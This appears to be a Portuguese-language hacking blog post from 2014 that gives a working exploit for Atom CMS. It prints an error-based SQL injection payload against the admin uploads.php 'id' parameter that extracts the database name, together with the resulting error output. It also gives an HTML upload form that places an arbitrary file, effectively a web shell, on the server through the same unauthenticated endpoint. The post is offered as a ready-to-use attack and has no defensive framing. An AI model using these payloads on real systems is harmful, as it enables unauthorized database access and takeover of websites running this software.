terça-feira, 5 de agosto de 2014

Atom CMS SQL Injection e file upload


0x Atom CMS SQL Injection e file upload 

Por ainda não ser uma cms com muita visibilidade na cena acho que ainda há poucos sites utilizando mas vamos lá atom é uma cms de código abeto se quiserem baixa la ela se encontra aqui 

0x Exploração 

SQL INJECTION

http://127.0.0.1/acms/admin/uploads.php?id=1 and(select 1 FROM(select
count(*),concat((select (select concat(database())) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)

O site lhe retornara o nome do banco de dados na ultima linha da pagina

UPDATE users SET avatar = '1404709440490.' WHERE id = 1 and(select 1
FROM(select count(*),concat((select (select concat(database())) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
Duplicate entry 'acms1' for key 'group_key'

                                                                    FILE UPLOAD

Mais uma vez iremos salvar um pequeno codigo como xpl.html e executaremos via browser 

  1. <form action="http://127.0.0.1/atom_cms/admin/uploads.php"
  2. method="post"
  3. enctype="multipart/form-data">
  4. <label for="file">Filename:</label>
  5. <input type="file" name="file" id="file"><br>
  6. <input type="submit" name="submit" value="exploit">
  7. </form>

Obtendo acesso a shell 

http://127.0.0.1/atom_cms/uploads/

Nenhum comentário:

Postar um comentário

............